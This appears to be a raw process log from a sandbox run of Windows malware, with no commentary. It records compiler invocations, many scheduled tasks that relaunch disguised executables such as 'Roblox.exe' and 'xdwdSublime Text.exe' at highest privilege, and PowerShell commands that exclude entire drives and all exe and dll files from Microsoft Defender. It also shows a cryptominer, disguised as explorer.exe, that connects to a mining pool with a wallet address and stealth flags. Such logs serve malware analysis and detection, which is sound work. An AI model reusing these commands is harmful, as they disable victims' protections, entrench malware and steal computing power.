"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuwvmi3t\yuwvmi3t.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES470.tmp" "c:\Recovery\WindowsRE\CSCC7783D3289374321A5F2785D92A2CEE9.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\camgvsp2\camgvsp2.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D7.tmp" "c:\Program Files (x86)\Microsoft.NET\RedistList\CSC7A0F739559C14E76B9FCB2905B968626.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dqs4vyuy\dqs4vyuy.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B2.tmp" "c:\Recovery\WindowsRE\CSC9D15F18DF25B4EBC9AFC5D7EFCDC912E.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\unbjjxr2\unbjjxr2.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES73E.tmp" "c:\Windows\Vss\Writers\Application\CSC1695FE976BC94F94849813BF48BB424.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wo0r4xno\wo0r4xno.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES867.tmp" "c:\Windows\SKB\LanguageModels\CSCF579D11E63E4D1AA25EA79FCBFF6CC.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avbd4xd1\avbd4xd1.cmdline"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES961.tmp" "c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hwun14pc\hwun14pc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6B.tmp" "c:\Program Files\Uninstall Information\CSC7DE149071344984BABDF789467E5B10.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zdiymwed\zdiymwed.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB65.tmp" "c:\Program Files (x86)\Internet Explorer\ja-JP\CSC7EF3102F42B4454780319C960827883.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2pkbp2db\2pkbp2db.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC30.tmp" "c:\Users\Default\Pictures\CSC153B9179EE0B46AA9D569016ABEAE6.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2jgjupzb\2jgjupzb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC0.tmp" "c:\Recovery\WindowsRE\CSC6D4CDB6BEEFF47A79AD646A942B52992.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2mua0gou\2mua0gou.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10A5.tmp" "c:\Users\All Users\Documents\CSC84F997DF90245D3B8FB2CA93EAEE763.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3fqzhcs1\3fqzhcs1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CE.tmp" "c:\DriversavessessionDlldhcp\CSC3597879E6DB949CA948CF8F65C6C1C2B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqtzcw4y\cqtzcw4y.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES12A8.tmp" "c:\winNet\CSC35AC1482CA674AE5A4682B0E9D49A28.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuwg5pdy\yuwg5pdy.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13C2.tmp" "c:\DriversavessessionDlldhcp\CSC91E33477D10D4389B8D462A4608C15A1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a1si3ueb\a1si3ueb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES144E.tmp" "c:\Users\Admin\Music\CSCE81E5B3D68EC4E5A97015F99F63D030.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b5otnzkc\b5otnzkc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1596.tmp" "c:\Windows\System32\CSC9923422659A044C39A5D951F6C4B4A87.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tvn8rY4Wma.bat"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\Recovery\WindowsRE\RuntimeBroker.exe

"C:\Recovery\WindowsRE\RuntimeBroker.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

